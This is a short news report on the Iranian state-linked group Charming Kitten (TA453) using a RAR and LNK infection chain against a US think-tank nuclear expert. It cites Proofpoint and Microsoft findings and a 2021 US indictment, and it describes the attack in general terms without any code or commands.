A state-sponsored Iranian hacker group recently employed a new infection chain to target a nuclear security expert at a US think tank.
Charming Kitten, also known as TA453, APT42, Mint Sandstorm, and Yellow Garuda earlier targeted high-value accounts in government, academia, NGOs, national security, and journalism.
As part of their recent operation, the IRGC-linked group used a benign email to begin a relationship with their target. Then they sent a follow-up email containing a malicious macro that directed the target to a Dropbox URL.
“Using a .rar and LNK file to deploy malware differs from TA453’s typical infection chain of using VBA macros or remote template injection. The LNK enclosed in the RAR used PowerShell to download additional stages from a cloud hosting provider,” a new analysis by Proofpoint says.
“The use of Google Scripts, Dropbox, and CleverApps demonstrates that TA453 continues to subscribe to a multi-cloud approach in its efforts to likely minimize disruptions from threat hunters. (...) Regardless of the infection method, TA453 continues to deploy modular backdoors in an effort to collect intelligence from highly targeted individuals,” Proofpoint said.
In April, Microsoft warned that hackers linked to Iran are targeting critical US infrastructure including transport, energy and ports. A report by Microsoft Threat Intelligence revealed the threat from the Iranian hackers, known as "Mint Sandstorm".
Initially engaged in reconnaissance, the subgroup eventually began attacking critical infrastructure organizations in the United States in 2022. In November 2021, the United States Justice Department indicted two Iranians, Mohammad Hosein Musa Kazemi and Sajjad Kashian, who were employed by Emennet Pasargad. During the 2020 presidential election, they allegedly conducted a cyber campaign "to intimidate and influence American voters".